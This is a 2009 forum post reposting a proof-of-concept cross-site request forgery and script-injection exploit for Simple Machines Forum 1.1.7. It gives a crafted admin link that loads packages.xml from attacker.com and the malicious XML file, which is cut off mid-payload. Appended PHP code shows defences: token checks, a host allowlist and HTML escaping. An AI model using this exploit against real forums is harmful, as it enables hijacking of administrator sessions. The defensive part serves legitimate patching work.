    Simple Machines Forum =1.1.7 XSRF/XSS

    Post by Admin on Sat Mar 07, 2009 6:07 pm

    --------------------------------------------------------------------------------

    Friends, here you go: a vulnerability has turned up in SMF 1.1.7. Version 1.1.8 is out, and I recommend that you update.
    Author: Xianur0
    Vulnerable Version: All

    The Bug is located in the file: Sources/PackageGet.php

    Example:
    http://victm.com/index.php?action=pa...//attacker.com

    When the admin follows the link, SMF loads the file:

    http://attacker.com/packages.xml

    Save this file as packages.xml

    <?xml version="1.0"?>
    <!DOCTYPE modification SYSTEM "http://www.simplemachines.org/xml/package-list">
    <!-- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
    XSRF SMF PoC By Xianur0
    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -->

    <package-list xmlns="http://www.simplemachines.org/xml/package-list"
    xmlns:smf="http://www.simplemachines.org/">
    <list-title>Xianur0 Was Here</list-title>

    <section>
    <title>SMF XSS PoC By Xianur0</title>
    <text><![CDATA[********>alert(’XSS’)</script>]]></text>
    <modification>
    <id>Xianur0:XSMF</id>
    <name>SMF PoC By Xianur0</name>
    <filename>smfexploit.zip</filename>
    <version>0.1</version>
    <author email="uxmal666@gmail.com">Xianur0</author>
    <description><![CDATA[********>alert(document

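The defences that match the XSRF/XSS classification in the title, as an added example that is not part of the original post and not SMF's own code: a session-token check on the request, an allowlist for package servers, and HTML-escaping of every field taken from the remote package list. All function names, the `token` parameter and the allowlisted host are hypothetical, and the sample XML is constructed.

```php
<?php
// Added example, not SMF's code: all function names and the host allowlist are hypothetical.
const TRUSTED_PACKAGE_HOSTS = ['packages.example.org']; // constructed placeholder

// XSRF defence: the request that triggers the fetch must carry the per-session token.
function has_valid_token(array $session, array $query): bool
{
    return isset($session['token'], $query['token'])
        && is_string($session['token']) && is_string($query['token'])
        && hash_equals($session['token'], $query['token']);
}

// Only fetch package lists from servers the administrator registered beforehand.
function is_trusted_package_server(string $url): bool
{
    $parts = parse_url($url);
    return is_array($parts) && isset($parts['scheme'], $parts['host'])
        && strtolower($parts['scheme']) === 'https'
        && in_array(strtolower($parts['host']), TRUSTED_PACKAGE_HOSTS, true);
}

// XSS defence: every text field from the remote list is HTML-escaped before output.
function render_package_list(string $xml): string
{
    $doc = new DOMDocument();
    // LIBXML_NONET forbids network access while parsing (e.g. fetching the DOCTYPE's DTD).
    if (!@$doc->loadXML($xml, LIBXML_NONET)) {
        return '';
    }
    $fields = ['list-title', 'title', 'text', 'name', 'description'];
    $html = '';
    foreach ($doc->getElementsByTagName('*') as $node) {
        if (in_array($node->localName, $fields, true)) {
            $html .= '<p class="' . $node->localName . '">'
                . htmlspecialchars($node->textContent, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8')
                . "</p>\n";
        }
    }
    return $html;
}

// Constructed sample: a package list whose <text> field carries markup.
$sample = '<?xml version="1.0"?><package-list><section><title>Demo</title>'
    . '<text><![CDATA[<script>alert(1)</script>]]></text></section></package-list>';

var_dump(is_trusted_package_server('http://attacker.com/packages.xml')); // host from the post
var_dump(has_valid_token(['token' => 'abc123'], []));                    // link without a token
echo render_package_list($sample);                                       // markup shown as text
```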